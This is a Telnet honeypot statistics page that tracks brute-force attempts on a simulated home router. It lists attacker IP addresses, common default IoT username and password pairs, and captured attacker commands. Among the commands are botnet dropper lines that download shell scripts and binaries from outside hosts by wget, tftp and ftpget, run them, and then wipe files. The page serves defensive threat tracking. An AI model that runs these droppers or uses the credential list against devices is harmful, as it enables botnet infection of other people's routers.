Honeypot Telnet

This page is updated daily. Last update: 2018-10-19 22:09:01 UTC

The following Telnet blacklists (updated every day, in text format) contain the IP addresses of hosts that tried to brute-force their way into my honeypot, located in Italy.
The honeypot simulates a home router with a weak password and the most common commands.

Monthly Telnet login attempts

Attacker blacklists (IP address)

24 hours (txt)
week (txt)
year (txt)

Other information

All passwords ordered by length (txt)
HTTP URLs collected (txt)
Monthly connections (txt)

Statistics - 2018

Unique IP addresses: 22442
Unique usernames: 612
Unique passwords: 1442

Latest commands executed

Timestamp | Command | IP address | AS | AS Org | Country
2018-10-19 | enableÍsystemÍ | 37.6.88.23 | 25472 | WIND-AS, GR | GR
2018-10-19 | enableÍsystemÍ | 37.6.88.23 | 25472 | WIND-AS, GR | GR
2018-10-19 | enableÍsystemÍ | 37.6.88.23 | 25472 | WIND-AS, GR | GR
2018-10-19 | enable | 23.242.108.228 | 20001 | ROADRUNNER-WEST Time Warn... | US
2018-10-19 | enable | 163.53.83.95 | 45433 | KISPL-AS-IN Kappa Interne... | IN
2018-10-19 | enable | 176.50.208.124 | 12389 | ROSTELECOM-AS, RU | RU
2018-10-19 | enable | 176.50.208.124 | 12389 | ROSTELECOM-AS, RU | RU
2018-10-19 | enable | 176.50.208.124 | 12389 | ROSTELECOM-AS, RU | RU
2018-10-19 | enable | 176.50.208.124 | 12389 | ROSTELECOM-AS, RU | RU
2018-10-19 | enable | 95.237.7.94 | 3269 | ASN-IBSNAZ, IT | IT

Top sessions per distinct IP address - 2018

IP Address | AS | AS Org | Country
185.12.179.208 | 200185 | XANDMAIL-ASN, DE | DE
205.185.117.65 | 53667 | PONYNET FranTech Solutions, US | US
46.101.36.85 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | GB
94.177.248.67 | 199883 | ARUBACLOUDLTD-ASN, GB | UNK
188.166.119.55 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | NL
62.211.128.95 | 3269 | ASN-IBSNAZ, IT | IT
159.89.123.246 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | UNK
178.62.71.53 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | GB
171.221.218.100 | 4134 | CHINANET-BACKBONE No.31,J... | CN
79.41.72.16 | 3269 | ASN-IBSNAZ, IT | IT

Login attempts last 10 days

Date | Occurrences
2018-10-19 | 1818
2018-10-18 | 1522
2018-10-17 | 1875
2018-10-16 | 1848
2018-10-15 | 2233
2018-10-14 | 2676
2018-10-13 | 2443
2018-10-12 | 2435
2018-10-11 | 2056
2018-10-10 | 1841

Top username - 2018

Username
root
shell
enable
admin
default
guest
user
support
supervisor
Administrator

Top password - 2018

Password
sh
system
admin
default
12345
1234
password
bin
user
aquario

Top username/password - 2018

Username / Password
shell / sh
enable / system
root / vizxv
admin / admin
root / default
root / aquario
support / support
user / user
root / xc3511
root / anko

Top commands - 2018

Command
enable
enable
linuxsh
/bin/busybox wget http://fun.r00ts.ninja/bins/arm -O - > scanHA; /bin/busybox chmod 777 scanHA; ./scanHA telnet.scanner; /bin/busybox SORA
sh
sh\r\nshell\r\nenable\r\nlinuxshell\r\nsystem
start
PAYLOADZZZZ
ping 127.0.0.1 -c1 && sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.237.179/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 89.34.237.179 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 89.34.237.179; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 89.34.237.179 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit

See also

Detux - multiplatform Linux Sandbox
IoT bad password sheet by krebsonsecurity.com
Leaked Mirai source code for research/IoC development purposes